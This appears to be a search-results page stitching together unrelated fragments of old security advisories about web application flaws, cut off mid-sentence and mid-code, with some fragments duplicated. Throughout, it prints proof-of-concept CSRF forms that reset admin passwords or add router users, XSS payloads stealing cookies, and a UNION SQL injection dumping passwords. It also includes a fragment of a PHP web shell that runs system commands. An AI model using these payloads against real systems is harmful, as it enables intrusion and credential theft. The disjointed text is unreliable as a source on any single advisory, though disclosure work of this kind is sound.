Next Page >>
form
Status: Fixed by Vendor
Risk level: High
Credit: High-Tech Bridge SA Security Research Lab ( https://www.htbridge.ch/advisory/ )
Vulnerability Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in SiT! Support Incident Tracker, which can be exploited to perform SQL injection, cross-site scripting, cross-site request forgery attacks.
1) Input passed via the "start" GET parameter to /portal/kb.php is not properly sanitised before being used in a SQL query.
This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
The following PoC code is available:
</style>
headka;
$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
$page=$page==''||($page!='Created by Cr@zy_King'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
$winda=strpos(strtolower(php_uname()),'wind');
define('format',50);
$pages='<center>###<a href=\''.basename(__FILE__).'\'>Created by Cr@zy_King</a>###</center>'.($winda===false?'id :'.`id`:'');
switch($page)
{
case 'eval':
{
####################
Original Exploit URL: http://bugreport.ir/index.php?/39/exploit
3.1. Everyone can change admin password.
-------------
<form action="http://[URL]/asp/bs_login.asp?btnAction=cSaveAdminPW" method="post">
adminPassword: <input type="text" name="adminPassword" value="" size="30" /><br />
adminPasswordConfirm: <input type="text" name="adminPasswordConfirm" value="" size="30" /><br />
<input type="submit" />
</form>
-------------
The following examples will allow an attacker to enable remote access to
the
iSpot and ClearSpot 4G, and add their own account to the device. This level
of access also provides a device's client-side SSL certificates, which are
used to perform device authentication. This could lead to a compromise of
ClearWire accounts as well as other personal information.
Add new user:
<form method="post" action="http://192.168.1.1/cgi-bin/webmain.cgi"
<http://192.168.1.1/cgi-bin/webmain.cgi%22>>
1- [Remote Attacker] can login to hosting controller Panel. He can also change all others' passwords.
2- [User] can copy a file to hosting controller web directory which is executed under administrative privilege, so attacker can execute his commands by administrative privilege. e.g. an attacker can gain remote desktop of server using this bug and uploading an ASP file!
3- [Remote Attacker] can make a new user.
4- [Remote Attacker] can change all user's profiles.
5- [User] can see all the database information by a SQL injection.
6- [User] can change his credit amount or increase his discount.
7- [User] can uninstall other's FrontPage extensions.
8- [User] can delete all of gateway information.
9- [User] can enable or disable pay type.
10- [[User] can see all usernames in the server by "fp2000/NEWSRVR.asp".
The following PoC code is available:
BOF
<form method=post action="http://127.0.0.1/mibew164/operator/ban.php">
<input type=hidden name="address" value='codseq'>
<input type=hidden name="days" value="1">
<input type=hidden name="threadid" value='1"><script>alert(1)</script>'>
<input type=hidden name="comment" value="dasd">
III. ANALYSIS
Summary:
A) "Dump Servlet" information leak
(Affected versions: Any)
B) "FORM Authentication demo" information leak
(Affected versions: Any)
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c02048471
Version: 3
HPSBGN02511 SSRT100022 rev.3 - Certain HP Small Form Factor, Microtower and Workstations PC's with Broadcom Integrated NIC Firmware, Remote Execution of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2010-05-17
Last Updated: 2010-05-17
.top {BACKGROUND-COLOR: "#D0D0D0"}
.firstalt {BACKGROUND-COLOR: "#000000"}
.secondalt {BACKGROUND-COLOR: "#000000"}
</style>
<SCRIPT language=JavaScript>
function CheckAll(form) {
for (var i=0;i<form.elements.length;i++) {
var e = form.elements[i];
if (e.name != 'chkall')
e.checked = form.chkall.checked;
}
Advisory Information
Advisory ID: NGENUITY-2010-006
Date published: Aug. 7, 2010
Class: Cross-Site Request Forgery (CSRF)
Software Description
filename can be guessed, if attacker knows database name. This file is also
directly downloadable from website. Example download URI:
http://localhost/torrenttrader109/backups/torrenttrader109-10-06-2009.gz
As result information leakage exists. For example, attacker can fetch admin
credentials from backed up database.
4. Sql Injection vulnerability in "browse.php"
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c02048471
Version: 2
HPSBGN02511 SSRT100022 rev.2 - HP Small Form Factor or Microtower PC with Broadcom Integrated NIC Firmware, Remote Execution of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2010-03-15
Last Updated: 2010-03-16
Date released: 11/2010
Date reported: 04/2009
by Fatih Kilic
Fraunhofer Institute for Secure Information Technology
fatih.kilic@sit.fraunhofer.de
http://security.fatihkilic.de/advisory/fkilic-sa-2010-ibm-omnifind.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3890
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3891
Information
--------------------
Name : XSS vulnerability in Webmin
Software : All versions prior to and including 1.540 are affected.
Vendor Hompeage : http://www.webmin.com
Vulnerability Type : Cross-Site Scripting
Severity : Medium
Researcher : Javier Bassi <javierbassi [at] gmail [dot] com>
An attacker can use browser to exploit this vulnerability. The following PoC is available:
1.
<form action="http://host/add_story.php" method="post" name="main">
<input type="hidden" name="story_url" value='http://www.example.com/"><script>alert(document.cookie)</script>'>
<input type="hidden" name="Submit" value="Continue">
</form>
<script>
document.main.submit();
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in osCmax, which can be exploited to perform SQL Injection and Cross-Site Scripting (XSS) attacks.
1) Multiple Cross-Site Scripting (XSS) in osCmax: CVE-2012-1664
1.1 Input passed via the "username" POST parameter to /admin/login.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in XOOPS, which can be exploited to perform Cross-Site Scripting (XSS) attacks.
1) Multiple Cross-Site Scripting (XSS) in XOOPS: CVE-2012-0984
1.1 Input passed via the "to_userid" POST parameter to /modules/pm/pmlite.php is not properly sanitised before being returned to the user.
The key part of the advisory for me wasn't VIEWSTATE as much as it was the controls, but this statement you made seemed pretty outrageous (with regard to ASP.NET):
'These vulnerabilities show that unsigned client-side viewstates will ALWAYS result in a vulnerability in the affected products.'
I would disagree - it depends how the software developer implemented use of the VIEWSTATE's content. In ASP.NET, the interesting part here was that you appeared to be controlling an innerhtml property of a Form control through the VIEWSTATE. What your example didn't show, I'm assuming, is some code behind that pulled out the <IndexedString> and set the value in the form's innerHtml property/attribute. That's just dangerous coding, akin to trusting client-side input and no different than acting on client input that came from any method, form input, JSON, etc. Your repro was a bit confusing/misleading without that part. Otherwise, were you saying that some controls inherently populate their properties/attributes from VIEWSTATE content automagically?
There have been past discussions on VIEWSTATE's security:
Scott Mitchell documented tampering VIEWSTATE in a 2004 article:
http://msdn.microsoft.com/en-us/library/ms972976.aspx#viewstate_topic12
Date released: 21.12.2009
Date reported: 28.07.2009
$Revision: 1.1 $
by Alexander Klink
Fraunhofer Institute for Secure Information Technology
alexander.klink@sit.fraunhofer.de
https://www.klink.name/security/aklink-sa-2009-001-sqledger-several-issues.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3580
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3581
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3582
www.sektioneins.de
-= Security Advisory =-
Advisory: Horde Application Framework Horde_Form_Type_image
Arbitrary File Overwrite Vulnerability
Release Date: 2009/09/18
Last Modified: 2009/09/18
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
http://www.coresecurity.com/corelabs/
Internet Explorer Security Zone restrictions bypass
1. *Advisory Information*
Title: Internet Explorer Security Zone restrictions bypass
Advisory ID: CORE-2008-0826
Advisory URL: http://www.coresecurity.com/content/ie-security-zone-bypass
Date published: 2009-06-09
Security Advisory
-----------------
FlatPress 0.804-0.812.1 Local File Inclusion to Remote Command Execution
Researcher Information
----------------------
Discovered by: Giuseppe `Zmax` Fuggiano
Website: http://www.giusef.net
Contact: giuseppe(dot)fuggiano(at)gmail(dot)com
GREETZ: hawk, pin3ska, black ant_, qwert666, ua and gacmaan
DIRECTORY TRAVERSAL
http://victim.com/?p=[ONE OF THE EXISITING FILES]-[EXISITING ACTION IN
THIS FILE]-
Most of actions load templates form bad directory and then throw an exception.
example:
http://victim.com/?p=../actions_admin/settings-config
#########################
COOKIE XSS
______________________
[SQL Injection]
- {search.php} -
<form action="http://localhost/yblog/search.php" method="post">
<input type="hidden" name="q" value="' union select 0,1,2,3,usuario,5,6,7,8,9,10,password,12,13,14,15,16 from usuarios/*">
<input type="submit" value="send">
</form>
<form action="http://localhost/yblog/search.php" method="post">
component of WiKID with network client functions) the following
vulnerabilities were identified in the sample code:
file sample.php, line 251: PHP_SELF insecure usage leads to XSS
<form action="<?php echo $PHP_SELF ?>" method="POST" >
file sample.php, line 269: PHP_SELF insecure usage leads to XSS
<form action="<?php echo $PHP_SELF ?>" method="POST" >
2.0.0.6 Product:
Minimo <=.2 and Firefox 2.0.0.6
http://airscanner.com/security/07080103_minimo.2.htm
Platform:
Tested on Minimo .016 and .2 Windows Mobile Pocket PC 2005 and Firefox
2.0.0.6 Windows XP SP2
Requirements:
Mobile device running Windows Mobile Pocket PC or Firefox 2.0.0.6 on XP
@@ -120,7 +122,7 @@
String attributeName = (String)
attributeNamesEnumeration.nextElement();
%>
<tr>
- - <td align="center"><form action="<%= submitUrl %>"><div><input
type="hidden" name="path" value="<%= path %>" /><input type="hidden"
name="action" value="removeSessionAttribute" /><input type="hidden"
name="sessionId" value="<%= currentSessionId %>" /><input type="hidden"
name="attributeName" value="<%= attributeName %>" /><input type="submit"
value="Remove" /></div></form></td>
Example exploit:
-------------------------------------------------------------------------------
<html>
<head><title>CruxCMS 3.0.0 Unauthorized Password Reset PoC by waraxe</title></head>
<body><center>
<form action="http://localhost/cruxcms.3.0.0/manager/passwordreset.php" method="post">
<input type="hidden" name="ID" value="1">
<input type="hidden" name="Password" value="waraxe">
<input type="submit" value="Test!">
</form>
</center></body></html>
With these default credentials, internal attackers can modify device
configurations to leverage more significant attacks, including redirection
of DNS requests, creation of a remote VPN termination point, and
modification of NAT entries. These credentials provide access to the web
interface for management, as well as a telnet interface that provides shell
access to the device. The mso login provides shell as UID 0 (root).
Finding 2: Cross Site Request Forgery (CSRF)
CVE: CVE-2011-0886
The vulnerability exists due to failure in the "newsdesk/editnews.php", "projects/editproject.php", "clients/editclient.php" scripts to properly sanitize user-supplied input in "links", "url_dev", "url" variables. Successful exploitation of this vulnerabilities could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.
An attacker can use browser to exploit this vulnerability. The following PoC is available:
1.
<form action="http://host/newsdesk/editnews.php?id=NEWSID&action=update" method="post">
<input type="hidden" name="author" value="1">
<input type="hidden" name="title" value="news2">
<input type="hidden" name="related" value="g">
<input type="hidden" name="content" value="hello2">
<input type="hidden" name="links" value='2"><script>alert(document.cookie)</script>'>
Next Page>>
|
